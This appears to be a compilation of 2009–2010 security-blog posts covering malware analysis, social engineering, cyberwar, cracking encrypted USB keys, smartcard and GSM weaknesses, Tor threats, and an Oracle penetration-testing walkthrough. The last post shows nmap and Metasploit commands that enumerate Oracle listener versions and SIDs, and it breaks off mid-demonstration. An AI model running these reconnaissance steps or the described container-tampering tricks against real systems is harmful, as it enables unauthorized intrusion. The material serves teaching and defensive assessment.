-Encoding strings/values
-Manipulating imports
-Corrupting PE Header
-Overlapping Section Header
-Junk code
-SEH (exception handler patches memory)

Advanced Obfuscation Techniques

-Metamorphic nature
-Custom virtual machines (Polymorphic instruction sets)
-Encryption
-Instruction Timing (Model Specific Register (MSR), RDTSC instruction)
-Debugging register tricks
-Breakpoint detection
-VMWare detection

Malware Lab

-Virtualization Platform (VMware, Xensource, Qemu)
-Must not be on any network but its own
-Dynamic Internet Connection

Virtualization Techniques

-Serial Debugging
-Copy on Write
-Memory Image
-Fast reversion of images

Logging Activities

-Needed to store data from automatic and manual analysis.
-Malware analysis is far more useful with a corpus to compare against.
-The more data we have on characteristics, the more we are able to do a determination of whether it is malware.
-Reverse engineering is expensive in terms of man-power to do.
-Identify characteristics and understand malware to allocate reverse engineering where it is worthwhile to.
-Store actual malware sample
-Store network traces
-Store static forensics information

Obtaining Malware

-Be an anti-virus or anti-malware software vendor
-Join an existing antimalware intelligence groups (Honeynet Project, Sandnet)
-Build your own honeynet
-Beg, borrow or steal

Advanced Tools

-Debuggers (WinDBG, IDA, Ollydbg)
-Tracers (regmon, filemon, detours, apimonitor, strace)
-Unpackers (PEiD)
For more information: Practical Toolkit for Reverse Engineering

Conclusions

-Simple tracing/monitoring can give lots of information
-Static analysis of Malware can also yield many clues
-Storing all bits of data and characteristics in a database can yield large dividends
-Trend is toward decentralized botnets (p2p)
-New coordination efforts in botnet takedowns

Social Engineering: A science behind major Corporate Attacks

2010-02-07T01:38:00.013-04:30

All social engineering techniques are usually based on specific attributes of human decision-making known as cognitive biases. These biases, sometimes called "bugs in the human hardware," which can be exploited in various combinations to create attack techniques. Source: "Wikipedia".

Social Engineering misdirection takes advantage of the limits of the human mind in order to give the wrong picture and memory. The mind can concentrate on only one thing at a time. The magician uses this to manipulate the "victim's" idea of how the world is supposed to be.

Common Risks From Social Engineering
–Direct users to malware attack
–Trick users into executing malware
–Persuade users into handing the information (data leakage)

Past Recaps:
Nigeria 419 scams, since 1980s
Phishing at AOL users

-AOL's chat rooms have been awash in password-stealing since at least 1994.
-In one three-month period in 1996, AOL cancelled 370,000 accounts for "creditcard fraud, hacking, etc "Washington post".

Other Email Scams Since 90s
Changes In The Social Engineering Attacks

Internet Statistics (1990-2008)
-Online presence1,463,632,361 –Internet users worldwide (June 2008).
-1.3 billion–email users worldwide. 210 billion emails sent per day (2008).
-Web Sites: 186,727,854–in December 2008. 31.5 million added during 2008.

Targeting Users for your Attack?
Using Popular Search Terms
Using celebrities popularity
Cyber attackers use Terrorist tactics
Terrorist cells are increasingly looking at less well-protected "soft" targets where Westerners can be found, such as social and retailvenues, tourist sites and transport networks (rail, road and airports), as illustrated by the attacks in Bali in October 2002,Madrid in March 2004 and Egypt in July 2005.

Business Strategies?

77% of employees have a Facebook account.
2/3rd access during working hours for average 15mins per day.
87% couldn’t define a clear business reason.
1 in 33 built and manage their entire profile at work.
1.47% total lost productivity across entire employee population.

Common issues with social networking

Who are you really communicating with?
–Has their account been compromised?
–Has the provider of the tool/service been compromised?
–Has the content been tampered?
–Does it have an abbreviated URL?

Stopping users getting to the compromised sites
–Content filtering: Needs real time intelligence.

Ensuring users don’t self infect
–Anti-malware solution
–Control what users can execute: User Access Control (Microsoft), Whitelistingtools (apple model - Digitally signed applications, 3rd party whitelisting tools) -Behavioural controls (IPS, FW, etc): Harden OS, Control what can be installed, used, interacted with other resources.
-Data leakage: Education, Data Loss Prevention controls (DRM).

Digital Reputation - Risk Management
Monitoring and controlling Social Networking Usage
-56% of employers admit to monitoring employees to see if accessing on-line social networking sites, amongst others things.
-38% block employees from accessing such websites.
-1/3rd of employers have adopted policies limiting or prohibiting use of such sites during work time.
-6% have terminated employees for utilizing online social networking sites during work.

CyberWar, CyberTerror and CyberCrime

2010-01-27T16:48:00.010-04:30

During the past few years, these terms have refined and brought enormous attention in the media. However, the actual definitions remain same but keep blending with the growing threats.

As mentioned in Wikipedia:

CyberWar - Also known as "Cyber Warfare", is the use of computers and the Internet in conducting warfare in cyberspace.

CyberTerror - Cyberterrorism is a controversial term. The premeditated use of disruptive activities, or the threat thereof, against computers and/or networks, with the intention to cause harm or further social, ideological, religious, political or similar objectives Or to intimidate any person in furtherance of such objectives.

CyberCrime - Computer crime encompass a broad range of potentially illegal activities. This involves, crimes that target computer networks or devices directly or crimes facilitated by computer networks or devices, the primary target of which is independent of the computer network or device.

Now, I am going to point some of the key facts and their associated conflicts in dimension with cyber warfare.

-Distributed attacks, high anonymity.
-Possibility to use the same enemy’s infrastructures.
-Low cost of technology implementation and R&D.
-Wide range of critical infrastructures to be attacked.
-Possibility to carry out unconventional activities.
-Direct contact with the enemy’s command and control center at the highest ranks.

Evaluation#1:
In the traditional wars, to fight a country it requires a huge amount of resources (weapons, ammunition, etc). While, in asymmetric Internet based conflicts, to fight a country it can take just a few or just one motivated skilled hacker.

Cyber Politics (Historical track-record)
2001 Pakistan vs West
2002 USA vs China
2004 South America vs USA
2007 Arab countries vs Denmark
2007 Russia vs Estonia
2008 Russia vs Georgia

Cyber Industrial and Private Espionage
2001 Pakistan vs India
2005 China vs EU (political)
2005 China vs Italy (industrial)
2006 Russia vs USA (militar)
2008 China vs rest of the world
2009 China vs USA (preemptive war?)

Evaluation#2:
-The tactical systems were downloading nothing most of the time and when they were downloading they downloaded irrealistic data.
-The system was so slow in distributing the intelligence that we knew about the enemy presence only when it was in front of us and shooting.
-Too much of intelligence = No intelligence!

Lessons Never Learned
-Germany (Parliament law against security/hacking tools).
-France (Sarkozy doctrine).
-Italy (Pisanu decree).
-Sweden (The Pirate Bay case).
-All other countries (Blindness towards multi-layered threats and blindness towards excessive data retention).

Lessons Learned
-Use proprietary software and hardware when possible. And when it is not possible, use at least well reviewed open sourced software.
-Excessive data retention causes more troubles than benefits. There is a hidden danger from the social point of view as once adopted and enforced a data retentive policy, it will take a revolution to take it down (remember the London airport case?).

Durante los últimos años, estos términos han estado referidos y llamando la atención de los medios. Sin embargo, las definiciones actuales siguen siendo iguales, y se mantienen con las crecientes amenazas.

Según Wikipedia:

CyberWar (Ciber-Guerra): También conocido como "Cyber Warfare", es el uso de las computadoras y el internet para realizar la guerra en el ciberespacio.

CyberTerror – Cyberterrorism: el ciberterrorismo o terrorismo electrónico es el uso de medios de tecnologías de información, comunicación, informática, electrónica o similar con el propósito de generar terror o miedo generalizado en una población, clase dirigente o gobierno, causando con ello una violencia a la libre voluntad de las personas. Los fines pueden ser económicos, políticos o religiosos principalmente.

CyberCrime (CiberCrimen): El delito informático abarca una amplia gama de actividades potencialmente ilegales. Esto implica, los crímenes en el que las redes de computadoras, dispositivos de las mismas son el objetivo o crímenes facilitados por las redes o sus dispositivos, el objetivo principal de que es independiente de la red del ordenador o dispositivo.

Ahora, partamos del punto clave y sus conflictos asociados en dimensión con la Ciber-Guerra.

-Ataques distribuidos, con un anonimato alto.
-Posibilidad de utilizar la infraestructura del mismo enemigo.
-Bajo costo de implementación tecnológica y R&D.
-Amplia gama de infraestructuras críticas para ser atacados.
-Posibilidad de realizar actividades no convencionales.
-El contacto directo con el comando del enemigo y el centro de control en los rangos más altos.

Evaluación # 1:
En las guerras tradicionales, para luchar contra un país se requiere una enorme cantidad de recursos (armas, municiones, etc.) Si bien, en Internet basados en los conflictos asimétricos, para luchar contra un país que puede tomar sólo unos pocos o sólo un hacker experto motivado.

Ciber Politicas (Historia)
2001 Pakistan vs West
2002 USA vs China
2004 South America vs USA
2007 Arab countries vs Denmark
2007 Russia vs Estonia
2008 Russia vs Georgia

Ciber Industria y Espionage Privado
2001 Pakistan vs India
2005 China vs EU (politico)
2005 China vs Italy (industrial)
2006 Russia vs USA (militar)
2008 China vs rest of the world
2009 China vs USA (guerra preventiva?)

Evaluación # 2:
-Los sistemas tácticos se descarga nada más de las veces y cuando se descarga que los datos transferidos irrealista.
-El sistema era tan lento en la distribución de la inteligencia que sabíamos acerca de la presencia del enemigo sólo cuando estaba delante de nosotros y de tiro.
-El exceso de inteligencia = nada de inteligencia!

Lecciones no aprendidas
-Alemania (ley del Parlamento contra la seguridad / herramientas de hacking).
-Francia (doctrina de Sarkozy).
-Italia (decreto Pisanu).
-Suecia (El caso de Pirate Bay).
-Todos los otros países (ceguera ante los múltiples niveles de amenazas y la ceguera a la retención excesiva de datos).

Lecciones aprendidas
Uso de software propietario y de hardware cuando sea posible. Y cuando no es posible, al menos la revisión más actual del software de código abierto.
-Excesiva retención de datos provoca más problemas que beneficios. Hay un peligro oculto desde el punto de vista social, ya que una vez adoptado y aplicada una política de retención de datos, será necesaria una revolución para revocarla (recordemos el caso del aeropuerto de Londres?).

S.A & R.M

Cracking The Cryptographic Systems

2010-01-18T04:49:00.009-04:30

Many reverse engineers always try to break the cryptographic protocols/applications using reverse engineering process as their primary key. The process itself is known as "Cryptanalysis". It is hard, time consuming and resource mean. A common way to break the commercial crypto system is to reverse the code and find the implementation errors. I will take two such commercial examples below:

– MXI Stealth
– EISST E-capsule PrivateSafe

MXI Stealth
- FIPS 142-3 level 2 certified USB Key
- AES on-chip encryption
- Authentication through password (windows application) or fingerprint (OS independent)
- Upon connection a first removable drive with a locked contents appears.
- Upon successful authentication a second drive appears.

Problem with Technology
Passwords are injected upon creation from external USB interface. A random salt is also added as a plain text through USB and stored in the EEPROM. Combined password with salt is then hashed using SHA-256 bit algorithm and stored again in EEPROM with associated user. Now upon failed password attempt there is a delay of 500ms. However, this delay also applies when a password verfication operation is done. This gap allows a maximum of 120 tries/minute. It gives an attacker enough time to break into.

- There is a library to exchange encrypted messages with the key.
– Apparently the password is encrypted and sent to the key.
– After some messages are exchanged the protected disk is activated.
- A logging function is implemented. It does not write log messages into a log file but they can be seen in the memory.
– A simple patch of the code can reactivate the log file.

- The 60 byte string are three SHA1 hashes. The current password and the previous 2 passwords.
- The "enterprise" version of the software needs this info to make sure the user does not reuse
the current and last "n" passwords.
- This information is received by the software even before the user has authenticated.

EISST E-capsule PrivateSafe

PrivateSafe is a software that creates encrypted containers.
There are 4 passwords:
1. The admin password allows managing the container.
2. The public password reveals one part of the content.
3. The private passwod gives access to the rest of the content.
4. The panic password deletes all files and gives access to an empty container.

There are 2 files:
1. The encrypted file system.
2. A control file.

Through reverse engineering we found that:
- Each block of the control file is encrypted with AES 256 CTS mode.
– The key is the SHA256 hash of the corresponding password.
– The IV is the ripemd160 hash of the password.
– The clear text of blocks 1,2 and 3 are the same. Block 0 corresponds to the admin key.

- Exchanging two blocks in the control file inverts the role of their keys. E.g, private <-> public
- Worse. E.g, Shred <-> private
- Actually, exchanging just the single ascii character that identify the blocks is enough.

El Malware y su futuro en el 2010

2010-01-04T13:56:00.006-04:30

Según wikipedia el “Malware es un software que tiene como objetivo infiltrarse en el sistema y dañar la computadora sin el conocimiento de su dueño, con finalidades muy diversas…”
Un ejemplo de malware son los troyanos (esos programitas que parecen inofensivos pero le dan acceso remoto a una persona sin nuestro consentimiento), los virus ya conocidos por todos, etc.

Desde que la banca coloco sus sistemas al público mediante internet para darle la facilidad al usuario final, de que realice sus operaciones sin trasladarse físicamente a una sucursal, los delincuentes tuvieron que evolucionar, atacar ese campo que estaba naciendo y que no había sido tocado por ellos, el ataque más conocido por la población hoy en día es el Phishing. Pero hay una modalidad de malware que va contra el sector bancario online y es el Crimeware. El desarrollo de este tipo de software es muy lucrativo para los programadores o blackhats que se especializan en esta modalidad, este tipo de software se aprovecha de vulnerabilidades de sistemas operativos o vulnerabilidades en programas instalados para infectar al usuario.

Herramientas como: Liberty Exploit System, Neon Exploit System, Sploit25, Unique Sploits Pack, Eleonore Exploits Pack, YES Exploit System, etc., pueden ir desde 500$US hasta 3000$US. Esta cantidad de dinero por el desarrollo de malware hace que los programadores saquen provecho por la venta de estos sistemas y hasta den garantías a sus compradores sobre si su sistema es detectado por algún antivirus.

Dependiendo del tipo de malware y lo complejo que sea varia su precio, encontraran ofertas en internet de troyanos por 250$US hasta los sistemas de crimeware mencionado anteriormente. Rusia lleva la delantera y le sigue china en el desarrollo de malware. Los nuevos estudios de Mcafee Labs pronostican que en el 2010 la compañía que será más atacada por este tipo de malware va a ser Adobe y se dejara de lado a Microsoft Office, debido a que se van encontrando nuevas vulnerabilidades en sus programas lideres como Adobe Reader y Adobe Flash. Solamente con abrir un sencillo PDF realizado por estos sistemas y una versión vulnerable de Adobe Reader el usuario sin darse cuenta se descarga un malware, se infecta y ya pasa a ser una víctima más en el mundo de los ciber-delitos, lo mismo pasaría con una animación Flash.

Más allá, la Cyber-Warfare también puede ir por este rumbo y cualquier país involucrado utilizaría estos sistemas para en vez de ir contra lo monetario atacar los sistemas informáticos gubernamentales de su contraparte mediante estas botnets.
Adobe constantemente está en la corrección de estas vulnerabilidades y han desarrollado un blog para este tipo de temas, claro está que si como usuarios no ponemos de nuestra parte y no mantenemos los sistemas actualizados, no será nada útil las correcciones que se hagan a nivel de desarrollo de código hasta que instalemos los updates necesarios.

Para más info sobre adobe y su blog: http://blogs.adobe.com/psirt/

GSM Security and 90's Mobsters

2009-12-17T17:45:00.009-04:30

There are number of mobile/cell technologies available in the market today, however, the issues like security and privacy have remained the top concerns for every single network provider. Evaluating the generic GSM technology can give a brief overview on security controls within the cellphone/network system.

Information on SIM card generally includes:
-Phonebook
-Call Register Information
-Private Photos/Videos
-SMS/MMS
-Technical Network Information

GSM Network Structure Overview

What security protocols are being used?

A3 - Authentication mechanism for GSM Security
A5/1 - Stream Cipher for voice privacy
A5/2 - Weakest stream cipher for voice privacy
A5/3 - Provides confidentiality and integrity for mobile communications

So, are our call secure over GSM network? The answer is "no".

Scanning and decoding the GSM traffic using Nokia 3310 toolkit + Universal Radio Peripheral.

Nokia 3310
MBUS data cable
Wireshark
Gsmdecode (Linux)

Overall view of GSM Cellphone System Breach

Breaking The SmartCard Payment Security System

2009-11-30T11:16:00.010-04:30

In the recent years, there has been a huge amount of development within e-commerce industry. One of the remarks to secure POS(point of sale) and other electronic payments is to use SmartCard Payment System (Chip & PIN technology). Its simple procedure allow customers to insert contact-smartcard at any POS and enter the PIN code into PED (Pin Entry Device) before authorizing the transaction.

SmartCard Protocol

1. Card To PED
Cardholder details captured (cardholder name, account, expiry, CVC, etc) and other magnetic strip information.

2. PED Display
Transaction description (currency type, value) and PIN entered by customer.

3. Final Authorization
PIN verification results and authorization code.

For this protocol standard to work securely, it is required to develop PED being tamper proofed. This foundation has been forced and practiced widely by VISA, EMV, PCI and APACS (UK). The evaluation of PED is then performed by well-established standards such as "Common Criteria".

Protection Measures and Possible Tampering

Tampered Switches within PED

Dione Xtreme

Ingenico i3300

Tamper Resistance

As of the current protection mechanisms deployed under PED help banks to secure their keys but not the actual customer details. Cardholder details including PIN code are sent unencrypted between card and PED. Thus, if a fraudster intercept these details a fake or clone of the card can be used to withdraw cash on ATMs worldwide depending on the capability of card type and issuer. Following are the key points highlighting weaknesses from the past done by various researchers.

-Loop holes in the tamper mesh allows commnication to be intercepted. Such that an easily accessible compartment can hide a recording device.

-Dione PED is vulnerable to route the card details outside resistance controller. A customized FPGA design can be used to capture the data.
-The relay attack scenario.

Root Causes For SmartCard Security Failure

-Engineering Challanges: 3,662 pages of Visa Chip & PIN specifications.
-Economic Incentives: Standard PED security works well to protect bank keys but customer's PIN left vulnerable.
-Certification Failure: PED passed its necessary certification requirements despite of the technical/design flaws mentioned above.

Security Measures

-PED design can be improved but the smartcard communication with PED is inherently difficult to protect.
-Encrypted PIN verification is mandatory and the copy of magnetic strip data should never be stored on the chip.
-Banks can improve the security but are not responsible for any fraud, putting liability on banks correct the incentives.
-Protocol designers making unrealistic assumptions of tamper resistance can put the bank customers at risk of fraud.

Practical Toolkit for Reverse Engineering

2009-11-13T05:21:00.003-04:30

Many people has been involved in Reversing Engineering area for years. It is still considered attractive for many hackers and crackers to breakthrough and discover unknown possibilities exist to reverse the system objectives. Today in our article we will represent some of the core practical explanations on reverse engineering tactics.

Reverse Engineering is basically described as a way to generate high-level architectural view of piece of software from the given source. Several applications involved within RE scope are vulnerability analysis, malware analysis and breaking copy-protection schemes. One can start learning the basics of RE either through 'crack-me' approach or the real-life approach (take the real-world problem, break it and attack it).

Tools of The Trade

1. Debuggers
WinDbg - Rich features, Extensive C++ support, Poor interface.
Visual Studio Debugger - Not suitable for reversing, Good interface for development.
OllyDbg - Excellent interface, easy to use, wide range of plugins.
Immunity Debugger - Extends OllyDbg features, supports Python interpreter, command-line support with windbg commands, wide range of plugins.
GDb - Standard debugger for *NIX systems, not a complete RE debugger.

2. Disassemblers
Objdump - The standard tool for disassembley in Linux.
IDA Pro - Supports various binaries and architectures, Enhance Visualization, Advanced features.

3. System Monitoring Tools
Sysinternals Suite - Process Exlorer, RegMon, FileMon, TCPView

4. Binary Differential Tool
BinDiff

5. Decompilers
Hex-Rays

6. Reverse Engineering Frameworks
PaiMei
ERESI

7. Dedicated Exploitation/Reverse Engineering Environment
DVL (Damn Vulnerable Linux)

Cutting Edge Steps on Advanced Reverse Engineering

-Automation is one of the major tasks in advancing the RE process.
-Most of the tools are scriptable, extensible and programmable.
-Defeating a new anti-debugging solutions
-Develop new RE environment, such as, Virtualization and Sandboxing.
-Joining one on another tool can make a powerful toolset for RE.

Exploiting Rich Internet Applications (RIA)

2009-10-29T22:13:00.006-04:30

Due to fast adoption of internet technologies like Web 2.0 and their integration with advanced web applications has raised unexpected security challenges. In this article we will review some of these issues related to Adobe Flash product. Flash supports wide range of multimedia features including, rich web application development, video streaming, games and many more. Flash can be deployed within browser or as a system application to run SWF(flash-supported) files. The SWF file consists of 64 tag types, each of which contains its own type, length and value. These can be reviewed in the following picture.

As many of the features are exposed through tags title and tags data. One of such tags is ActionScript. It provides extensible functionality for rich applications. It is mainly based on ECMAScript and when compiled is converted to ActionRecord sub-tags. These sub-tags are then stored into DoAction meta data. A single stream of ActionRecords is terminated by ActionEnd tag. Now, based on the published statistics and product popularity, it is easy to compile the information about how many Flash deployments are openly available throughout the internet under various operating systems and mobile devices (Target Scanning).

-Flash is available for all major OS(s).
-It is installed with default settings.
-ActionScript v2 is supported.

There are several security issues discovered in ActionScript v2 (AS2) in past, which can cause a serious damage to all computers loaded with Flash and connected over the internet. These vulnerabilities can easily be exploited due to improper implementation of flash-based web applications and poses major risk to all internet users. Thus, we introduce two assessment methodologies to test the security of flash applications.

Manual Testing

To understand the testing procedures and dissect the simple flash file in depth, we used Adobe Flash CS3. Inside this tool we got various facilities to audit the flash movie. ActionScript Editor is the one we can use to test several conditions, such as editing the source with first frame set as, getURL("http://www.example.com"); On the other hand, one can also use SweetScape 010 Editor to do the similar testing.

Automated Testing

Fault Injection for Reverse Engineers (FIRE) Framework
-Gathering Input
Get the target flash movie to perform mutation.

-Survey Input
Survey logic will skip textual data regions in the file like XML, HTML, ASCII and mark the binary data such as ActionScripfor fault injection tests.

-Process Instrumentation
FIRE invokes the Browser COM object on start-up and monitor continuously through the debugger. By monitoring the execution of "CreateWindow" and other error conditions it is easy to measure the faults.

-Mutate Input
Fault injection can be performed on batch of file(s) and is mutated with integer overflows 8bit, 16bit, 32bit. Once the fault has been injected, the final event is sent to target application to trigger the tested SWF file.

-Process Monitoring
Whenever one code point is executed, a breakpoint will be hitted and the relevant event will be generated by FIRE to deliver it to the target listener. Some of these events are ModuleLoad Event, FaultDelivered Event, ApplicationFailure Event, ApplicationCriticalFailure Event.

-Bug Analysis
If the FIRE debugger encounter the ApplicationFailure Event or ApplicationCriticalFailure Event, it will record the case by collecting the input stream, thread context and stack trace information that will help us further to investigate the possible bug inside target input file.

Unicode: A Look Inside the Core of System Security

2009-10-20T10:25:00.008-04:30

Unicode is a industry standard that is used to assign a unique number for every character independent of the platform or application. There can be different set of encoding systems used to represent a single language. For instance, English uses several encodings to cover all letters, symbols and punctuation.

One of the major problems is:
These encoding systems also conflict with one another. That is, two encodings can use the same number for two different characters, or use different numbers for the same character. Any given computer (especially servers) needs to support many different encodings; yet whenever data is passed between different encodings or platforms, that data always runs the risk of corruption. (http://unicode.org/standard/WhatIsUnicode.html)

This shows that the use of Unicode system may reveal a serious threat to end users, applications, operating systems and programming languages. Unicode v5 is a complex and large standard, such that, it provides code points, normalization, case mapping, categorization, escapings, conversion tables, binary properties, etc. Additionally, it includes several code pages and charsets like Shift_jis, Gb2312, Windows-1252, ISO-8859-1, EBCDIC-037. Furthermore, the ASCII range is reserved from U+0000 to U+007F. Unicode v5.1 holds a 21-bit scalar value with space for over 1,100,000 code points (U+0000 - U+10FFFF). For instance, the english character 'A' represents U+0041 value.

Encodings with different number of bits can be presented as:

UTF-8 (variable width 1-4 bytes)
UTF-16 (Endianess, variable width 2 or 4 bytes)
UTF-32 (Endianess, Fixed width 4 bytes, Fixed mapping)

After anticipating the above mentioned properties of Unicode system, it is quite obvious to find the root causes of data encoding and transformation problems. Some of them are listed below:

-Visual Spoofing
-Best-fit mappings
-Normalization
-Overlong UTF-8
-Character Substitution
-Character Deletion
-Casing
-Buffer Overflows
-Controlling Syntax
-Charset Transformation
-Charset Mismatch

Putting in consideration only one problem domain 'Visual Spoofing' which governs that in over 1,100,000 assigned characters look alike within the same or across multiple language scripts. The example is given below:

Such problems are the real threats. In the real-world attack scenario on International Domain Names (IDN), these can be used to spoof the actual website. For example:

gobiz.com "is not" gobiz.com

The first letter of the 1st Domain contains "Latin U+0069 char" and the first letter of the 2nd domain represents "Latin U+0261 char". Does it make any visual difference? Thus, some of the main attack vectors that leverages visual spoofing are:

-Non-unicode attacks
-Problematic font-rendering
-Confusable charaters
-Manipulating combining marks
-Syntax spoofing

Tools that can help interpret such problems within web applications are:

Watcher
http://websecuritytool.codeplex.com/
-Passive web application auditing

Unibomber
http://www.casabasecurity.com/content/unibomber-tool-specialized-xss-testing
-XSS autopwn testing tool

Evolution of SmartGrid: A new Game for Owning the Continent

2009-10-02T00:46:00.005-04:30

The life of human has dramatically changed from the manual work to automation during the past few years. This change has brought excellent benefits to the humanity and significant change to our environment making the life easier and trustworthy. However, the lack of 'security' into automation has raised challenging questions to provide a resource with confidentiality, integrity, availability and accountability. And because of distributed nature of the internet, it has also become harder to control and regulate the illegal activities cross the border which requires additional law/petitions among countries.

SmartGrid is a digital technology for providing electricity. It allows the suppliers to remotely control the consumption of consumers electric energy and amend any possible variation in rates. In similar way, it does help users to monitor their energy usage in real-time. The major objectives of SmartGrid technology is to increase reliability, efficiency, perfectness and safety of the country's electrical infrastructure. Integration of security in such digital technology is vital and must be implemented with a broad vision. Currently, The Energy Independence and Security Act of 2007 has provided Energy Department with necessary guidelines to develop SmartGrid program. On the other side, US-NIST has been assigned with core responsibility of developing a framework of security for the SmartGrid and the project named by NIST called "Smart Grid Interoperability Project".

Current Security Initiatives (SmartGrid)

-Energy Independence and Security Act of 2007 (bill signed on 18-DEC-2007)
-NIST Smart Grid Interoperability Project (initial standards published on 8-MAY-2009)
-Advanced Metering Infrastructure (AMI) System Security Requirements v1.01 (Released on 17-DEC-2008)
-Critical Electric Infrastructure Protection Act (CEIPA) - (HR 2195) (Introduced on 30-APRIL-2009)

Challenges

In response to the current state of design and implemetation of Smart Grid technology, it is an unfortunate condition for those such as, Salt River Project and Austin Energy, who had already started this revolution years back because of no proper security integration from the initial step of production. Thus, the security will be add-on feature for some SmartGrid producers after implementation. From the anticipation of electronic industry like banks and financial institutions, health care, manufacturers and other similar market segments facing critical threats at different levels today, it is quite obvious to judge the future of SmartGrid security. Some of which are given below:

1. Penetration testing for Smart Meters have shown negative signs, allowing attacker to take full control over the meters.
2. Wide scale denial of service (DoS) attacks are possible.
3. Application threats (exploiting OSI layer-7 to control the full usage of electricity over multiple homes/businesses).
4. Physical Security threat (if malicious adversary successfully access the SmartGrid controller room).
5. Controlling SmartGrid network, thus owning the whole continent?

A very serious initiatives will be forwarded by FERC in 2010 to fine the utility companies up to "$1million dollars per day" if any found non-compliance with security standards. Hence, there is more to come in near future.

Security Threats in Tor Design

2009-09-26T23:56:00.010-04:30

The Tor Project is one of the open-source solutions available to protect privacy and security over the network communication. There are currently 1500 active relays supported and 300,000+ active users world-wide. The basic definition of 'anonimity' is interpreted differently by different set of users. For instance, home users refer it as a privacy solution/anti-censorship, commercial sector call it a network security mechanism and the Government institutions take it as a traffic-analysis resistance.

Consider a simple relay architecture as below, in which each user hide its anonimity behind single proxy host.

Now, you can imagine that single relay could turn to be eavesdropper or single point of failure in communication. So, joining multiple relay-gates can add stability and anonimity in communication.

In this joint-relay conversation over the network, a corrupted node (RelayHost D) can identify that 'Shawn' is talking but never know to whom. Similarly, another node (RelayHost G) can tell that somebody is talking to 'Rosi' but don't know who. Thus, the integrity of privacy is secured, however, visualizing a typical Tor network design (Centralized Directory Protocol) can reveal

other set of threats.

Practical Security Problems

1. Tor hides your identity/location but never encrypt 'COMPLETE' set of network traffic, thus, vulnerable to eavesdropping attack on the internet.
2. Communication on ports like 23, 110, 109 etc should be refused by Tor?
3. Active attack on web cookies (e.g. Gmail Account) are still handy.
4. Before creating new Tor node, you need to be verified by central authority? Does it really exist?
5. What if your node is running anti-virus protection program on the top of win32 platform to detect malicious traffic? What will be the consequences?
6. What if you are relaying through the China node and its ISP is hijacking sessions using SSL MiTM attack.
7. No more than 2 inter-routing relays on one IP address is feasible?
8. Is it really secure to use Tor application directly from USB leaving no traces? How about WINDOWS/Prefetch folder and Registry entries?
9. Problems where communication take place from Tor to Non-Tor node and backward.
10. Abnormal use of proxy settings by the application can result in privacy exposure.
11. Clogging and congestion attacks.

Some Security Measures

1. Filter the connections by blocking unwanted directory authorities.
2. Filter unwanted relay IP addresses.
3. Prevent users from finding the Tor service running on your machine.
4. Cap on filtering based on Tor's network fingerprint.
5. Consider adaptive padding to the traffic.
6. Use higher level of encryption as possible (i.e. AES 256).
7. Integrate efficient algorithm for allocating connections safely to Tor circuit.

Russian Cyberspace: A daylight in the dark world

2009-09-13T23:33:00.008-04:30

Due to rapid increase in number of internet users and technology, the magnitude of threat-ratio is also multiplying every year. Cyber crime in today's fast moving world is considered as a potential business. FBI recorded and reported a loss of $265 million during the annual year of 2008. However, these does not cover other billions USD loss counted towards other parts of the world. Due to unfair nature of national and international cyber law enforcement structure and joint efforts of overseas government may result in serious problems between two or more countries.

Loss reported always become a part of "strategic revenue recovery plan" for the organizations by imposing higher prices on current products or by increasing the service charges for new or existing customers. Today's cyber crime is highly organized, transitional and very secretive with major criminal groups operating from more than 30 countries. The trend of cybercrime has emerged during the late 1990s to early 2000s in eastern Europe (i.e Republic of Soviet Union and other countries). Due to the presence of injustice and lack of law and order, the highly educated and technologically powered segments of population in Russia conduct sophisticated criminal activities to make their living. Apart from financial motivation, these criminals successfully suppress ethical anxiety and fear of stealing someone else entire life savings
by hiding their identity and forwarding the national justifications.

Statements like:

"They deserve what they are getting after what they've done to us"
"We are taking back what's rightfully ours"

are really common in online forums based in Eastern Europe. The highlights of which can be seen below:

In October 2004, FBI run a joint operation with Secret Service and USPIS called "Operation Firewall" which resulted in several arrests and termination of online criminal portals, "ShadowCrew" and "CarderPlanet". Other successful operations have also come forward, such as "Operation Cardkeeper" and "DarkMarket" in 2006 targeting the US and Western European criminals, concluded in October 2008 with 60 consecutive arrests. This fear has brought significant changes to the underground community such that many have left this illegal business and took their careers in different directions and those who remain intact gone underground.

Oracle Security Assessment: The Open Source Approach

2009-09-10T15:32:00.012-04:30

For the couple of years, number of Oracle vulnerabilities and exploits have been discovered in no order of standard methodology or appropriate guidelines. Moreover, there is no publicly available PenTesting Framework to check in-built packages for input validation attacks resulting in privilege escalation and data extraction. In this article, I will present the Oracle Pentesting Methodology in seven unique steps.

1. Discovery
Port Scanning for Oracle services can be done by using a simple Nmap tool. Oracle default ports are different for different products. But the main "Oracle TNS Listener" will always be using the range of 1521-1540 unless not changed.
For more information on ports used by Oracle, please visit:
http://www.red-database-security.com/whitepaper/oracle_default_ports.html

bt#: nmap -sV 192.168.0.100-105 -p 1521
Starting Nmap 4.85BETA8 ( http://nmap.org ) at 2009-06-18 15:25 EDT
Interesting ports on 192.168.0.100:
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS Listener
Interesting ports on 192.168.0.101:
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)

2. Version Enumeration/Fingerprinting
In order to know the exact version of "TNS Listener", we will use Metasploit auxiliary:

msf auxiliary(tnslsnr_version) > info
Name: Oracle tnslsnr Service Version Query.
Version: 6479
License: Metasploit Framework License (BSD)
Provided by: CG
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the tnslsnr service for the Oracle build.

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.100
RHOSTS => 192.168.0.100
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.100 is running: 32-bit Windows: Version 10.2.0.1.0 - Production

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.102
RHOSTS => 192.168.0.102
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.102 is running: Solaris: Version 10.2.0.1.0 - Production

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.103
RHOSTS => 192.168.0.103
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.103 is running: Linux: Version 11.1.0.6.0 - Production
[*] Auxiliary module execution completed

Now if we want to enumerate the "Oracle SID" for newer versions after 9.2.0.8, we have to put guess or bruteforce it.

[*] Host 192.168.0.105 is running: 32-bit Windows: Version 9.2.0.1.0 – Production
msf > use auxiliary/scanner/oracle/sid_enum
msf auxiliary(sid_enum) set RHOSTS 192.168.0.105
RHOSTS => 192.168.0.105
msf auxiliary(sid_enum) > run
